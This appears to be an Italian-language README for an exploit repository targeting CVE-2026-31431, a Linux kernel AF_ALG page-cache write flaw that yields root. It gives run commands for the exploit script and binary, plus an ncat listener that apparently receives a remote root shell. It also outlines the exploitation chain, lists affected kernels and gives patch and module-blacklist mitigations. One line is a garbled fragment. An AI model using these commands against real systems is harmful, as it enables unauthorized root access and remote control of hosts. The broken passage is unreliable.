
# Exploit di escalation dei privilegi locali per CVE-2026-31431 Exploit di escalation dei privilegi locali per CVE-2026-31431, un difetto logico nel kernel Linux AF_ALG che consente a utenti non privilegiati di scrivere 4 byte nella cache delle pagine e ottenere i privilegi di root. Include script PoC e indicazioni di mitigazione.
Copy Fail è una vulnerabilità di escalation dei privilegi locale (LPE) ad alta gravità nel sottosistema crittografico del kernel Linux (algif_aead). Scoperta e divulgata da Theori (tramite il loro strumento di ricerca di vulnerabilità assistito da IA Xint Code) il 29 aprile 2026, la falla consente a qualsiasi utente locale non privilegiato di scrivere 4 byte controllati nella cache delle pagine di qualsiasi file leggibile — e sfruttare ciò per ottenere root su praticamente ogni distribuzione Linux principale rilasciata dal 2017.
Un proof-of-concept funzionante è di soli ~732 byte di Python.
sudo ncat -lvnp PORT
# Usando lo script Python
python3 CVE-2026-31431-Exploit.py IP PORT
# Binario compilato
chmod +x CVE-2026-31431-Exploit
./CVE-2026-31431-Exploit IP PORT
AF_ALG e associalo a authencesn(hmac(sha256),cbc(aes))Essenzialmente ogni distribuzione Linux principale rilasciata dal 2017 è interessata.
Aggiorna il tuo kernel a una versione contenente il commit di correzione fafe0fa2995a. La maggior parte delle distribuzioni principali ha rilasciato o sta rilasciando pacchetti kernel aggiornati.
Se non puoi applicare la patch immediatamente:
algif_aead:
echo "blacklist algif_aead" | sudo tee /etc/modprobe.d/disable-algif-aead.conf
sudo modprobe -r algif_aead 2>/dev/null
Questo repository è solo a scopo educativo e difensivo. Le informazioni qui contenute hanno lo scopo di aiutare i team di sicurezza a comprendere, rilevare e mitigare CVE-2026-31431. Segui sempre le pratiche di divulgazione responsabile e le leggi applicabili.
| Campo | Dettaglio |
|---|
| ID CVE | CVE-2026-31431 |
| Punteggio CVSS | 7.8 (ALTO) |
| Tipo | Escalation dei Privilegi Locale (LPE) |
| Componente | algif_aead — interfaccia crittografica AF_ALG del kernel Linux per lo spazio utente |
| Causa Principale | Difetto logico nel template AEAD authencesn; un'ottimizzazione in-place (commit 72548b093ee3, agosto 2017) fa sì che le pagine della cache delle pagine appaiano nello scatterlist di destinazione scrivibile del kernel |
| Primitiva | Scrittura controllata di 4 byte nella cache delle pagine di qualsiasi file leggibile |
| Meccanismo dell'Exploit | Socket AF_ALG → splice() → corruzione della cache delle pagine di un binario setuid → root |
| Condizione di Gara? | ❌ Nessuna — difetto logico lineare, affidabilità al 100% |
| Offset del Kernel Necessario? | ❌ No |
| Commit di Correzione | fafe0fa2995a (annulla l'ottimizzazione del 2017) |
| Interessate | Non Interessate |
|---|
| Kernel Linux 4.14 fino a 7.0-rc | Kernel precedenti alla 4.14 (prima del commit di agosto 2017) |
| Tutte le 6.18.x precedenti alla 6.18.22 | 6.18.22+ (corrette) |
| Tutte le 6.19.x precedenti alla 6.19.12 | 6.19.12+ (corrette) |